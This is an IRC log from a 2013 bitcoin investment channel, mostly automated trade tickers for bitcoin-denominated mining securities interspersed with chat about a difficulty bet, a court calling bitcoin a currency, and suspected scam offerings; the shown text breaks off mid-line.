[BTCTC] [LABCOIN] 235 @ 0.001427 = 0.3353 BTC [+] Aug 09 02:13:46 [BTCTC] [LABCOIN] 1 @ 0.001428 BTC [+] Aug 09 02:13:48 [BTCTC] [LABCOIN] 14 @ 0.001429 = 0.02 BTC [+] Aug 09 02:14:43 [BTCTC] [LABCOIN] 6 @ 0.001429 = 0.0086 BTC [+] Aug 09 02:15:13 [BTCTC] [LABCOIN] 211 @ 0.001465 = 0.3091 BTC [+] Aug 09 02:16:56 [BTCTC] [LABCOIN] 10 @ 0.00145 = 0.0145 BTC [-] Aug 09 02:16:57 [BTCTC] [LABCOIN] 188 @ 0.00147 = 0.2764 BTC [+] Aug 09 02:16:58 [BTCTC] [LABCOIN] 352 @ 0.001471 = 0.5178 BTC [+] Aug 09 02:17:25 [HAVELOCK] [AM100] 3 @ 0.0358 = 0.1074 BTC [-] Aug 09 02:17:28 [HAVELOCK] [AM100] 10 @ 0.0353 = 0.353 BTC [-] Aug 09 02:17:30 [HAVELOCK] [AM100] 1 @ 0.0352 BTC [-] Aug 09 02:17:32 [HAVELOCK] [AM100] 27 @ 0.0351 = 0.9477 BTC [-] Aug 09 02:17:33 [HAVELOCK] [AM100] 27 @ 0.035 = 0.945 BTC [-] Aug 09 02:21:43 [BTCTC] [DMS.SELLING] 6 @ 0.02351 = 0.1411 BTC [+] Aug 09 02:22:49 [BTCTC] [BTCGARDEN] 28 @ 0.01587 = 0.4444 BTC [-] Aug 09 02:23:49 [BTCTC] [BTCGARDEN] 70 @ 0.01588 = 1.1116 BTC [+] Aug 09 02:25:27 hard not to make a big asicminer bet - pins & needles Aug 09 02:26:14 but, the market depth just depresses me Aug 09 02:27:04 [BTCTC] [DMS.MINING] 22 @ 0.004011 = 0.0882 BTC [+] Aug 09 02:27:06 [BTCTC] [DMS.MINING] 38 @ 0.00401 = 0.1524 BTC [-] Aug 09 02:27:07 [BTCTC] [DMS.MINING] 250 @ 0.004002 = 1.0005 BTC [-] Aug 09 02:27:08 [BTCTC] [DMS.MINING] 17 @ 0.004001 = 0.068 BTC [-] Aug 09 02:27:09 [BTCTC] [DMS.MINING] 1 @ 0.004 BTC [-] Aug 09 02:28:54 http://bitbet.us/bet/476/btc-network-difficulty-tops-52-million-by-end/ Aug 09 02:28:58 lmao look at that curve. Aug 09 02:29:02 BitBet - BTC network difficulty tops 52 million by end of August Aug 09 02:32:08 [BTCTC] [DMS.MINING] 1 @ 0.003999 BTC [-] Aug 09 02:32:09 [BTCTC] [DMS.MINING] 4 @ 0.003999 = 0.016 BTC [-] Aug 09 02:33:42 [BTCTC] [DMS.MINING] 1 @ 0.003997 BTC [-] Aug 09 02:35:07 [HAVELOCK] [XBOND] 20 @ 0.001047 = 0.0209 BTC [+] Aug 09 02:35:17 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 09 02:36:13 [BTCTC] [ASICMINER-PT] 1 @ 3.451 BTC [+] Aug 09 02:36:15 [BTCTC] [ASICMINER-PT] 2 @ 3.45 = 6.9 BTC [-] Aug 09 02:36:16 [BTCTC] [ACTIVEMINING] 25 @ 0.005103 = 0.1276 BTC [-] Aug 09 02:36:18 [BTCTC] [ACTIVEMINING] 50 @ 0.005102 = 0.2551 BTC [-] Aug 09 02:36:19 [BTCTC] [ACTIVEMINING] 2 @ 0.005101 = 0.0102 BTC [-] Aug 09 02:36:20 [BTCTC] [ACTIVEMINING] 180 @ 0.0051 = 0.918 BTC [-] Aug 09 02:36:21 [BTCTC] [ACTIVEMINING] 43 @ 0.0051 = 0.2193 BTC [-] Aug 09 02:36:50 [HAVELOCK] [AM100] 681 @ 0.035 = 23.835 BTC [-] Aug 09 02:37:37 [BTCTC] [DMS.MINING] 270 @ 0.003999 = 1.0797 BTC [+] Aug 09 02:37:39 [BTCTC] [DMS.MINING] 130 @ 0.004 = 0.52 BTC [+] Aug 09 02:38:22 [BTCTC] [BASIC-MINING] 1 @ 0.2594 BTC [+] Aug 09 02:38:22 [BTCTC] [BASIC-MINING] 10 @ 0.2595 = 2.595 BTC [+] Aug 09 02:38:24 [BTCTC] [BASIC-MINING] 3 @ 0.2598 = 0.7794 BTC [+] Aug 09 02:38:25 [BTCTC] [BASIC-MINING] 1 @ 0.2628 BTC [+] Aug 09 02:38:26 [BTCTC] [BASIC-MINING] 1 @ 0.2629 BTC [+] Aug 09 02:38:27 [BTCTC] [BASIC-MINING] 5 @ 0.263 = 1.315 BTC [+] Aug 09 02:38:28 [BTCTC] [BASIC-MINING] 1 @ 0.2639 BTC [+] Aug 09 02:38:29 [BTCTC] [BASIC-MINING] 5 @ 0.264 = 1.32 BTC [+] Aug 09 02:38:30 [BTCTC] [BASIC-MINING] 1 @ 0.2649 BTC [+] Aug 09 02:38:31 [BTCTC] [BASIC-MINING] 6 @ 0.265 = 1.59 BTC [+] Aug 09 02:38:32 [BTCTC] [BASIC-MINING] 4 @ 0.275 = 1.1 BTC [+] Aug 09 02:38:33 [BTCTC] [BASIC-MINING] 1 @ 0.2783 BTC [+] Aug 09 02:38:34 [BTCTC] [BASIC-MINING] 2 @ 0.2784 = 0.5568 BTC [+] Aug 09 02:38:35 [BTCTC] [BASIC-MINING] 1 @ 0.2795 BTC [+] Aug 09 02:38:36 [BTCTC] [BASIC-MINING] 4 @ 0.281 = 1.124 BTC [+] Aug 09 02:38:37 [BTCTC] [BASIC-MINING] 2 @ 0.2838 = 0.5676 BTC [+] Aug 09 02:38:38 [BTCTC] [BASIC-MINING] 2 @ 0.2839 = 0.5678 BTC [+] Aug 09 02:42:17 [BTCTC] [LABCOIN] 1 @ 0.001464 BTC [-] Aug 09 02:43:08 [BTCTC] [BASIC-MINING] 1 @ 0.2836 BTC [-] Aug 09 02:43:13 [HAVELOCK] [AM100] 1 @ 0.0345 BTC [-] Aug 09 02:43:19 [BTCTC] [DMS.MINING] 30 @ 0.004 = 0.12 BTC [+] Aug 09 02:44:01 mircea_popescu: well that's a 12% increase over the next 3 diff changes to make that bet true Aug 09 02:44:02 [BTCTC] [DMS.MINING] 1 @ 0.004 BTC [+] Aug 09 02:44:28 pretty heavy yea Aug 09 02:44:44 last month's edition got close but iirc didn't make it. Aug 09 02:45:27 [BTCTC] [DMS.MINING] 10 @ 0.004 = 0.04 BTC [+] Aug 09 02:45:44 i think where the diff change occurred tripped that bet up Aug 09 02:46:16 that is, people weren't calculating when the diff change happened, iirc also Aug 09 02:47:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.03424 = 0.1712 BTC [-] Aug 09 02:47:18 [BTCTC] [BTCGARDEN] 28 @ 0.01556 = 0.4357 BTC [-] Aug 09 02:47:19 [BTCTC] [BTCGARDEN] 25 @ 0.01555 = 0.3888 BTC [-] Aug 09 02:47:20 [BTCTC] [BTCGARDEN] 1120 @ 0.01551 = 17.3712 BTC [-] Aug 09 02:47:22 [BTCTC] [BTCGARDEN] 195 @ 0.0155 = 3.0225 BTC [-] Aug 09 02:47:24 [BTCTC] [BTCGARDEN] 1000 @ 0.0155 = 15.5 BTC [-] Aug 09 02:47:26 [BTCTC] [BTCGARDEN] 132 @ 0.0155 = 2.046 BTC [-] Aug 09 02:47:49 [HAVELOCK] [XBOND] 22 @ 0.0010469 = 0.023 BTC [-] Aug 09 02:50:40 apparently we have malaria vaccine now Aug 09 02:51:01 short mosquitos Aug 09 02:51:07 lmao Aug 09 02:51:26 [BTCTC] [ASICMINER-PT] 1 @ 3.476 BTC [+] Aug 09 02:51:27 [BTCTC] [ASICMINER-PT] 1 @ 3.478 BTC [+] Aug 09 02:51:35 http://yro.slashdot.org/story/13/08/07/2059250/federal-judge-declares-bitcoin-a-currency Aug 09 02:51:38 Federal Judge Declares Bitcoin a Currency - Slashdot Aug 09 02:51:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.03425 BTC [+] Aug 09 02:52:14 fuck the gov Aug 09 02:52:45 [BTCTC] [DMS.MINING] 8 @ 0.004 = 0.032 BTC [+] Aug 09 02:53:16 but american gov sets the rules for bitcoin these days Aug 09 02:53:21 so we have to obey Aug 09 02:53:39 not rly Aug 09 02:53:47 american gov sets rules for suckers living in america Aug 09 02:53:53 thats about it Aug 09 02:53:56 [BTCTC] [BTC-BOND] 4 @ 0.00999 = 0.04 BTC [-] Aug 09 02:53:58 [BTCTC] [BTC-BOND] 320 @ 0.00999 = 3.1968 BTC [-] Aug 09 02:54:05 [BTCTC] [NASTY-PT] 1 @ 0.0039 BTC [-] Aug 09 02:54:17 the drone outside my window says otherwise and i live on mars Aug 09 02:54:19 [HAVELOCK] [AM100] 15 @ 0.034 = 0.51 BTC [-] Aug 09 02:54:32 [BTCTC] [BTC-BOND] 5 @ 0.00995 = 0.0498 BTC [-] Aug 09 02:54:33 [BTCTC] [BTC-BOND] 10 @ 0.00995 = 0.0995 BTC [-] Aug 09 02:54:35 [BTCTC] [BTC-BOND] 16 @ 0.00994 = 0.159 BTC [-] Aug 09 02:54:36 [BTCTC] [BTC-BOND] 30 @ 0.009901 = 0.297 BTC [-] Aug 09 02:54:37 [BTCTC] [BTC-BOND] 966 @ 0.0099 = 9.5634 BTC [-] Aug 09 02:54:49 VanCleef_ oppinions of random magistrate judge in texas' poorest district be about as relevant as pirates' Aug 09 02:55:21 heh, guess dont have to take this news too seriously? Aug 09 02:55:39 [BTCTC] [BTCGARDEN] 126 @ 0.01588 = 2.0009 BTC [+] Aug 09 02:55:47 [BTCTC] [ASICMINER-PT] 1 @ 3.476 BTC [-] Aug 09 02:55:48 [BTCTC] [ASICMINER-PT] 3 @ 3.477 = 10.431 BTC [+] Aug 09 02:56:15 "In civil proceedings, magistrate judges typically manage discovery and other pretrial matters. They are authorized to issue orders in pretrial matters as long as the order is not dispositive of the case as a whole (such as an order granting summary judgment). They may also be assigned to write reports and recommendations to the district judge as to dispositive matters. With the consent of the parties, they may adjudic Aug 09 02:56:15 ate civil cases in the same manner as a district judge, including presiding over jury or non-jury trials." Aug 09 02:56:29 so let's not blow clerks out of proportion. Aug 09 02:56:38 does the fact that the judge used "btc = money" in the pirateat40 case this statement applicable in general/law? Aug 09 02:57:10 dexX7 it will certainly be presented as such by teh us government. Aug 09 02:57:25 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Aug 09 02:58:01 [HAVELOCK] [AM100] 20 @ 0.034 = 0.68 BTC [-] Aug 09 02:58:15 [HAVELOCK] [AM100] 2 @ 0.034 = 0.068 BTC [-] Aug 09 02:58:52 dexX7: in TX, yes for that federal district. But, we must either a) wait for other districts to rule the same; or b) wait for SCOTUS to rule the same Aug 09 02:58:53 [BTCTC] [ASICMINER-PT] 10 @ 3.4 = 34 BTC [-] Aug 09 02:59:05 anyway, the matter was fundamentally arbitration, handled by a magistrate judge by apparent consent of the parties. Aug 09 02:59:16 [BTCTC] [LABCOIN] 500 @ 0.00144 = 0.72 BTC [-] Aug 09 03:00:40 [HAVELOCK] [SDSTM] 4 @ 0.0062912 = 0.0252 BTC [-] Aug 09 03:00:44 [BTCTC] [LABCOIN] 50 @ 0.001434 = 0.0717 BTC [-] Aug 09 03:00:45 [BTCTC] [LABCOIN] 67 @ 0.001433 = 0.096 BTC [-] Aug 09 03:01:18 [BTCTC] [LABCOIN] 50 @ 0.001433 = 0.0717 BTC [-] Aug 09 03:01:19 [BTCTC] [LABCOIN] 2 @ 0.001402 = 0.0028 BTC [-] Aug 09 03:01:20 [BTCTC] [LABCOIN] 140 @ 0.001381 = 0.1933 BTC [-] Aug 09 03:01:40 [HAVELOCK] [AM100] 1 @ 0.034 BTC [-] Aug 09 03:02:50 [HAVELOCK] [AM100] 2 @ 0.034 = 0.068 BTC [-] Aug 09 03:04:53 so this might be used as reference for upcoming cases, but a magistrate judge's word doesn't have the same weight (obviously) as a surpreme court ruling Aug 09 03:05:21 [BTCTC] [ASICMINER-PT] 2 @ 3.39 = 6.78 BTC [-] Aug 09 03:05:22 [BTCTC] [ASICMINER-PT] 1 @ 3.389 BTC [-] Aug 09 03:06:19 [BTCTC] [ACTIVEMINING] 8 @ 0.00515 = 0.0412 BTC [+] Aug 09 03:08:22 but is this new? i assumed that the fincen guidelines already implied something similar Aug 09 03:09:27 "the matter was fundamentally arbitration" - wow! Aug 09 03:10:00 i think I would have asked for a ruling... unless I'd blown all my btc on day spas... Aug 09 03:11:15 [BTCTC] [ASICMINER-PT] 1 @ 3.388 BTC [-] Aug 09 03:11:56 [BTCTC] [ASICMINER-PT] 1 @ 3.389 BTC [+] Aug 09 03:12:04 optimator i half suspect the whole thing is a staged operation. Aug 09 03:12:21 the sec working with some random malfeasant to establish imaginary authorities over stuff Aug 09 03:13:12 [BTCTC] [TAT.ASICMINER] 50 @ 0.03425 = 1.7125 BTC [+] Aug 09 03:13:14 [BTCTC] [TAT.ASICMINER] 53 @ 0.03424 = 1.8147 BTC [-] Aug 09 03:15:09 dexX7 magistrate judges stand to district judges roughly in the relationship paralegals stand to lawyers. Aug 09 03:15:18 or ta's to teachers. Aug 09 03:15:21 hummm.. interesting thought - I certainly wouldn't discount it Aug 09 03:15:37 haha okay Aug 09 03:15:40 optimator wouldn't have been the first time. Aug 09 03:16:11 the most interesting pary was 1. they have 135,000 lost and cant find cloud 2. pirate like rub and tugs Aug 09 03:16:13 dexX7 if i had a penny for every district judge that ruled obamacare unconstitutional... Aug 09 03:16:15 part Aug 09 03:16:49 [HAVELOCK] [AM100] 4 @ 0.0345 = 0.138 BTC [+] Aug 09 03:17:17 [BTCTC] [DMS.SELLING] 5 @ 0.024 = 0.12 BTC [+] Aug 09 03:17:19 [BTCTC] [DMS.MINING] 5 @ 0.004 = 0.02 BTC [+] Aug 09 03:17:31 Hollywood: yeah. was that the delta number? 135K of transactions to pass throughs they can't figure out? Aug 09 03:17:47 if only we knew who the pass throughs were Aug 09 03:18:10 [BTCTC] [BITVPS] 3 @ 0.002093 = 0.0063 BTC [+] Aug 09 03:18:26 and... assbot delivers! Aug 09 03:19:35 [BTCTC] [DMS.MINING] 16 @ 0.004 = 0.064 BTC [+] Aug 09 03:21:56 mircea_popescu: "if i had a penny for every district judge" - I love that part. I love that some judges just thumb their noses at the federal government. States rights seem to be alive... Aug 09 03:22:45 hardly alive. the us government is by now out of control, entirely. if a district judge orders something they just appeal it. if the appelate court concurs they appeal again. Aug 09 03:22:50 [BTCTC] [DMS.MINING] 1 @ 0.004328 BTC [+] Aug 09 03:22:51 this is a decade of impunity. Aug 09 03:22:59 should the supreme court affirm... they just ignore it. Aug 09 03:23:25 as it was already the case once or twice last year, once before that and a couple of times this year already. Aug 09 03:23:30 [BTCTC] [BASIC-MINING] 3 @ 0.244 = 0.732 BTC [-] Aug 09 03:24:38 [HAVELOCK] [XBOND] 12 @ 0.0010464 = 0.0126 BTC [-] Aug 09 03:27:07 "hardly alive" - but it does embolden the populace. And the populace will be the ones who challenge the status quo... after they've seen the lions in the arena waiting to eat them Aug 09 03:27:44 [BTCTC] [BITVPS] 247 @ 0.002093 = 0.517 BTC [+] Aug 09 03:28:12 [BTCTC] [BITVPS] 11 @ 0.002094 = 0.023 BTC [+] Aug 09 03:28:14 [BTCTC] [BITVPS] 1 @ 0.0021 BTC [+] Aug 09 03:28:23 i think the populace first spends a decade or two without power or groceries. Aug 09 03:28:50 [BTCTC] [ASICMINER-PT] 3 @ 3.389 = 10.167 BTC [+] Aug 09 03:29:03 [HAVELOCK] [AM1] 1 @ 3.56000001 BTC [-] Aug 09 03:29:06 [HAVELOCK] [AM1] 1 @ 3.56 BTC [-] Aug 09 03:29:08 [HAVELOCK] [AM1] 1 @ 3.45 BTC [-] Aug 09 03:30:13 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [+] Aug 09 03:30:42 sure - the price of progress - time. The sheer size of the populace trumps the technocrats ideology Aug 09 03:31:06 eventually they see what we see today Aug 09 03:31:18 is dvdrewritable here? Aug 09 03:31:24 eventually Aug 09 03:31:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.03424 = 0.1712 BTC [-] Aug 09 03:31:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03424 BTC [-] Aug 09 03:32:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.0342 = 0.0684 BTC [-] Aug 09 03:32:02 [BTCTC] [TAT.ASICMINER] 28 @ 0.03415 = 0.9562 BTC [-] Aug 09 03:32:12 optimator problem is by the time they see it the culprits will have long left the room. Aug 09 03:32:18 ;;seen userioao Aug 09 03:32:18 userioao was last seen in #bitcoin-assets 3 days, 12 hours, 45 minutes, and 16 seconds ago: Can anyone recommend a side to buy prepaid virtual CC via bitcoin? Aug 09 03:32:31 basically the current administration is no different from trendon shavers Aug 09 03:32:54 maybe some difference in scope. but otherwise... i say it's a scam in april, people observe it's a scam in august. Aug 09 03:33:04 true. and does anyone learn from history books Aug 09 03:33:36 [BTCTC] [ACTIVEMINING] 30 @ 0.00521 = 0.1563 BTC [+] Aug 09 03:33:36 [BTCTC] [ACTIVEMINING] 50 @ 0.005211 = 0.2606 BTC [+] Aug 09 03:33:38 [BTCTC] [ACTIVEMINING] 68 @ 0.005212 = 0.3544 BTC [+] Aug 09 03:33:39 [BTCTC] [ACTIVEMINING] 623 @ 0.005213 = 3.2477 BTC [+] Aug 09 03:34:42 but people change in december. you & i would have liked them to change in april... but it takes until december Aug 09 03:34:47 scammers only :D Aug 09 03:34:59 [BTCTC] [BASIC-MINING] 1 @ 0.27 BTC [+] Aug 09 03:35:09 a, don't get me wrong, i don't really want them to anything in particular. not really my business. Aug 09 03:35:19 ahhh... scammers do learn - very funny Aug 09 03:36:44 anyway, read up on the magnificent hedges vs obama case, Aug 09 03:37:12 it's pretty good documentation of what a totalitarian regime looks like early on. Aug 09 03:37:50 [BTCTC] [DMS.MINING] 100 @ 0.0045 = 0.45 BTC [+] Aug 09 03:38:39 crazy... scammers and the elite recognize the change that is forced upon the world, everyone else suffers in ostrich silence. Aug 09 03:38:48 ok i'll google that Aug 09 03:39:03 Any word from Yifu? Aug 09 03:39:20 fuck i'm gonna bet that it's good news Aug 09 03:39:25 yeah he says STFU and leave me alone Aug 09 03:39:43 let me buy some shares Aug 09 03:39:57 i was just asking him about my 6 month order Aug 09 03:40:02 exo_ not afaik. Aug 09 03:40:12 [BTCTC] [LABCOIN] 629 @ 0.00138 = 0.868 BTC [-] Aug 09 03:40:20 usually people who get called out for lieing tend to take a little time off. Aug 09 03:40:21 [BTCTC] [ASICMINER-PT] 1 @ 3.398 BTC [+] Aug 09 03:42:12 [BTCTC] [ACTIVEMINING] 10 @ 0.005184 = 0.0518 BTC [-] Aug 09 03:43:52 [BTCTC] [LABCOIN] 94 @ 0.00138 = 0.1297 BTC [-] Aug 09 03:44:04 any mods around? Aug 09 03:44:59 i think @assbot is it - good luck with him - he's been a bitch Aug 09 03:45:00 there's mods ? Aug 09 03:46:16 [BTCTC] [BASIC-MINING] 1 @ 0.2701 BTC [+] Aug 09 03:47:03 [BTCTC] [BASIC-MINING] 1 @ 0.2725 BTC [+] Aug 09 03:49:10 [BTCTC] [BTCGARDEN] 100 @ 0.0157 = 1.57 BTC [-] Aug 09 03:49:11 [BTCTC] [BTCGARDEN] 80 @ 0.0156 = 1.248 BTC [-] Aug 09 03:50:13 a bitch you say? Aug 09 03:50:31 heh now you awoke the beast Aug 09 03:50:47 [BTCTC] [BASIC-MINING] 4 @ 0.2799 = 1.1196 BTC [+] Aug 09 03:51:14 [BTCTC] [DMS.MINING] 3 @ 0.004328 = 0.013 BTC [-] Aug 09 03:51:16 [BTCTC] [DMS.MINING] 47 @ 0.004 = 0.188 BTC [-] Aug 09 03:51:50 [BTCTC] [ASICMINER-PT] 2 @ 3.393 = 6.786 BTC [-] Aug 09 03:52:45 [BTCTC] [ACTIVEMINING] 19 @ 0.005146 = 0.0978 BTC [-] Aug 09 03:52:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005147 = 0.1544 BTC [+] Aug 09 03:52:47 [BTCTC] [ACTIVEMINING] 49 @ 0.005148 = 0.2523 BTC [+] Aug 09 03:53:01 heh, just mod6 Aug 09 03:53:02 ;;google get up there you big metal bird Aug 09 03:53:03 Transcript:Möbius Dick - The Infosphere, the Futurama Wiki: ; Time for my nightly jam session | Peace . Gold . Liberty - Daily Paul: ; Angry Birds Seasons Walkthrough Go Green Get Lucky Level 18 ...: mod6: :P:P:P Aug 09 03:53:36 ;D Aug 09 03:54:04 ;;getrating @assbot Aug 09 03:54:10 ;;getrating @assbot Aug 09 03:54:10 This user has not yet been rated. WARNING: Currently not authenticated. Aug 09 03:54:11 [BTCTC] [ACTIVEMINING] 68 @ 0.00514 = 0.3495 BTC [-] Aug 09 03:54:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005142 = 0.1543 BTC [+] Aug 09 03:54:24 awww shit @assbot Aug 09 03:54:52 ;;nethash Aug 09 03:54:53 371390.31754 Aug 09 03:56:47 [MPEX] [S.MPOE] 7252 @ 0.0008415 = 6.1026 BTC [+] Aug 09 03:56:48 [BTCTC] [LABCOIN] 1 @ 0.001397 BTC [+] Aug 09 03:56:50 [BTCTC] [LABCOIN] 30 @ 0.001398 = 0.0419 BTC [+] Aug 09 03:56:51 [BTCTC] [LABCOIN] 1562 @ 0.001399 = 2.1852 BTC [+] Aug 09 03:56:52 [BTCTC] [LABCOIN] 6407 @ 0.0014 = 8.9698 BTC [+] Aug 09 04:00:34 [BTCTC] [ASICMINER-PT] 2 @ 3.396 = 6.792 BTC [+] Aug 09 04:01:26 [BTCTC] [ACTIVEMINING] 9 @ 0.005211 = 0.0469 BTC [+] Aug 09 04:02:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005208 = 0.1562 BTC [-] Aug 09 04:02:06 [BTCTC] [ACTIVEMINING] 9 @ 0.005209 = 0.0469 BTC [+] Aug 09 04:02:07 [BTCTC] [ACTIVEMINING] 71 @ 0.005211 = 0.37 BTC [+] Aug 09 04:02:08 [BTCTC] [ACTIVEMINING] 23 @ 0.005215 = 0.1199 BTC [+] Aug 09 04:02:10 [BTCTC] [ACTIVEMINING] 5 @ 0.005228 = 0.0261 BTC [+] Aug 09 04:02:11 [BTCTC] [ACTIVEMINING] 38 @ 0.005229 = 0.1987 BTC [+] Aug 09 04:02:57 [BTCTC] [ASICMINER-PT] 1 @ 3.396 BTC [+] Aug 09 04:02:58 [BTCTC] [ACTIVEMINING] 1 @ 0.005207 BTC [-] Aug 09 04:03:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005207 = 0.1562 BTC [-] Aug 09 04:04:04 [BTCTC] [ASICMINER-PT] 1 @ 3.396 BTC [+] Aug 09 04:05:14 is there any reason to believe that samuel noi is user delaria of bitcointalk? Aug 09 04:05:17 [BTCTC] [LABCOIN] 20 @ 0.001398 = 0.028 BTC [-] Aug 09 04:05:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0345 = 0.1725 BTC [+] Aug 09 04:05:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.03408 = 0.2726 BTC [-] Aug 09 04:05:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Aug 09 04:05:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.034 = 0.102 BTC [-] Aug 09 04:05:40 [BTCTC] [ACTIVEMINING] 30 @ 0.005205 = 0.1562 BTC [-] Aug 09 04:05:41 [BTCTC] [ACTIVEMINING] 8 @ 0.005206 = 0.0416 BTC [+] Aug 09 04:05:43 [BTCTC] [ACTIVEMINING] 6 @ 0.005207 = 0.0312 BTC [+] Aug 09 04:05:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005208 = 0.2604 BTC [+] Aug 09 04:05:45 [BTCTC] [ACTIVEMINING] 14 @ 0.005255 = 0.0736 BTC [+] Aug 09 04:05:45 [BTCTC] [ACTIVEMINING] 64 @ 0.005256 = 0.3364 BTC [+] Aug 09 04:07:39 [BTCTC] [ASICMINER-PT] 2 @ 3.399 = 6.798 BTC [+] Aug 09 04:07:40 [BTCTC] [ASICMINER-PT] 2 @ 3.449 = 6.898 BTC [+] Aug 09 04:07:41 [BTCTC] [ASICMINER-PT] 3 @ 3.45 = 10.35 BTC [+] Aug 09 04:08:14 [BTCTC] [BITVPS] 19 @ 0.002101 = 0.0399 BTC [+] Aug 09 04:08:55 uh. who are either of those ? Aug 09 04:09:43 [BTCTC] [ASICMINER-PT] 2 @ 3.46 = 6.92 BTC [+] Aug 09 04:10:18 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [+] Aug 09 04:10:19 sam noi is one of the labcoin guys Aug 09 04:10:27 https://docs.google.com/file/d/0B7zur7xeBuaVRXFjOEFGTDkxNmM/edit Aug 09 04:10:29 labcoin_scam_p1.pdf - Google Drive Aug 09 04:10:38 dvdr created this doc earlier this day Aug 09 04:11:22 so far my "research" showed that almost everything is made up Aug 09 04:11:30 from dvdr, not lab Aug 09 04:12:32 some guy was here dropping that link. i never read it. Aug 09 04:12:45 people need to learn to use open and accessible formats not fucking pds and google docs. Aug 09 04:13:06 [BTCTC] [BTCGARDEN] 25 @ 0.01563 = 0.3908 BTC [+] Aug 09 04:13:07 [BTCTC] [BTCGARDEN] 25 @ 0.0155 = 0.3875 BTC [-] Aug 09 04:13:17 what would you prefer? pastebin? xD Aug 09 04:13:19 pdf = 10% more ipo btc Aug 09 04:13:24 dont ya know Aug 09 04:14:27 "this guy knows how to make pdfs, for sure he is capable of making asic" Aug 09 04:14:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.034 = 0.102 BTC [-] Aug 09 04:14:39 dexX7 pastebin works, forum posts work, blog posts work Aug 09 04:14:58 kakobrekla sounds legit. Aug 09 04:15:06 intresting doc Aug 09 04:17:22 http://www.zerohedge.com/news/2013-08-07/greek-villagers-chase-tax-collectors-out-town Aug 09 04:17:24 le lol. Aug 09 04:17:26 Greek Villagers Chase Tax Collectors Out Of Town | Zero Hedge Aug 09 04:19:11 maybe labcoin is a way for alberto to pay up for BDT Aug 09 04:20:00 ahahaha Aug 09 04:20:04 wait, the alberto dude is involved ?! Aug 09 04:20:14 bdt? Aug 09 04:20:45 dunno, i see italy in the documents Aug 09 04:21:40 hm. Aug 09 04:21:50 dexX7 you should sometime read through the scamlist. Aug 09 04:22:12 ;;google bitcoin drama timeline Aug 09 04:22:13 The Bitcoin Drama Timeline pe Trilema - Un blog de Mircea Popescu.: ; Bitcoin bubble burst? Currency suffers dramatic correction | Internet ...: ; Bitcoin drops another 35 percent as exchange reopens - CNET News: (1 more message) Aug 09 04:23:56 it's remarkable how much knowledge your blog contains Aug 09 04:24:44 [BTCTC] [ACTIVEMINING] 2 @ 0.005235 = 0.0105 BTC [-] Aug 09 04:27:01 [BTCTC] [ASICMINER-PT] 1 @ 3.364 BTC [-] Aug 09 04:28:09 not as remarkable if you think i've been at it for years. Aug 09 04:28:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.03462 = 0.0692 BTC [+] Aug 09 04:32:22 [HAVELOCK] [VTX] 1 @ 0.4651 BTC [-] Aug 09 04:32:24 [HAVELOCK] [VTX] 5 @ 0.46 = 2.3 BTC [-] Aug 09 04:32:27 [HAVELOCK] [VTX] 1 @ 0.4591 BTC [-] Aug 09 04:32:29 [HAVELOCK] [VTX] 1 @ 0.459 BTC [-] Aug 09 04:32:30 [HAVELOCK] [VTX] 1 @ 0.4520023 BTC [-] Aug 09 04:33:21 [HAVELOCK] [AM100] 10 @ 0.03401 = 0.3401 BTC [-] Aug 09 04:33:24 [HAVELOCK] [AM100] 5 @ 0.034 = 0.17 BTC [-] Aug 09 04:33:26 [HAVELOCK] [AM100] 1 @ 0.034 BTC [-] Aug 09 04:34:51 mircea is by far the best writer I have ever read. Aug 09 04:35:31 [BTCTC] [LTC-ATF.B2] 9 @ 0.01044 = 0.094 BTC [+] Aug 09 04:36:57 [HAVELOCK] [XBOND] 250 @ 0.001045 = 0.2613 BTC [-] Aug 09 04:38:16 [BTCTC] [ASICMINER-PT] 1 @ 3.395 BTC [+] Aug 09 04:41:25 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [+] Aug 09 04:41:27 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Aug 09 04:41:30 [BTCTC] [LABCOIN] 30 @ 0.001429 = 0.0429 BTC [+] Aug 09 04:41:32 [BTCTC] [LABCOIN] 20 @ 0.00142 = 0.0284 BTC [-] Aug 09 04:41:33 [BTCTC] [LABCOIN] 54 @ 0.001382 = 0.0746 BTC [-] Aug 09 04:41:33 [BTCTC] [LABCOIN] 20 @ 0.001381 = 0.0276 BTC [-] Aug 09 04:41:34 [BTCTC] [LABCOIN] 376 @ 0.00138 = 0.5189 BTC [-] Aug 09 04:43:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03452 BTC [-] Aug 09 04:44:03 ah come on. Aug 09 04:44:51 o[,p Aug 09 04:47:27 Does ASICMiner have a channel? Aug 09 04:47:40 not afaik. you might as well make it. Aug 09 04:47:42 [BTCTC] [LABCOIN] 30 @ 0.0014 = 0.042 BTC [+] Aug 09 04:47:42 [BTCTC] [LABCOIN] 235 @ 0.001399 = 0.3288 BTC [-] Aug 09 04:47:43 [BTCTC] [LABCOIN] 33 @ 0.001397 = 0.0461 BTC [-] Aug 09 04:47:44 [BTCTC] [LABCOIN] 20 @ 0.00139 = 0.0278 BTC [-] Aug 09 04:47:45 [BTCTC] [LABCOIN] 5 @ 0.001381 = 0.0069 BTC [-] Aug 09 04:47:46 [BTCTC] [LABCOIN] 41 @ 0.00138 = 0.0566 BTC [-] Aug 09 04:47:48 [BTCTC] [LABCOIN] 11 @ 0.001367 = 0.015 BTC [-] Aug 09 04:47:49 [BTCTC] [LABCOIN] 76 @ 0.001367 = 0.1039 BTC [-] Aug 09 04:47:50 [BTCTC] [LABCOIN] 549 @ 0.001366 